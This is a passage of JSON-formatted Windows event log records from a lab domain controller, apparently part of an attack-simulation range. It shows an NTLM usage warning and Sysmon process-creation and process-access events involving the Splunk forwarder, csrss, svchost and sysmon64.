Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":36028797018963968,"EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":6038,"SourceName":"LsaSrv","ProviderGuid":"{199FE037-2B82-40A9-82AC-E1D46C792B99}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76831,"ProcessID":0,"ThreadID":0,"Channel":"System","Message":"Microsoft Windows Server has detected that NTLM authentication is presently being used between clients and this server. This event occurs once per boot of the server on the first time a client uses NTLM with this server.\r\n \r\nNTLM is a weaker authentication mechanism. Please check:\r\n \r\n      Which applications are using NTLM authentication?\r\n      Are there configuration issues preventing the use of stronger authentication such as Kerberos authentication?\r\n      If NTLM must be supported, is Extended Protection configured?\r\n \r\nDetails on how to complete these checks can be found at http://go.microsoft.com/fwlink/?LinkId=225699.","Opcode":"Info","EventReceivedTime":"2020-08-01 07:53:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:36.866\r\nProcessGuid: {41C8662E-1F80-5F25-0000-0010CA260400}\r\nProcessId: 2772\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nFileVersion: 8.0.2\r\nDescription: Monitor windows event logs\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winevtlog.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:36.866","ProcessGuid":"{41C8662E-1F80-5F25-0000-0010CA260400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","FileVersion":"8.0.2","Description":"Monitor windows event logs","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winevtlog.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F80-5F25-0000-0010CA260400}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F80-5F25-0000-0010CA260400}","TargetProcessId":"2772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2359,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F80-5F25-0000-0010CA260400}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F80-5F25-0000-0010CA260400}","TargetProcessId":"2772","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:37.048\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:37.048","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
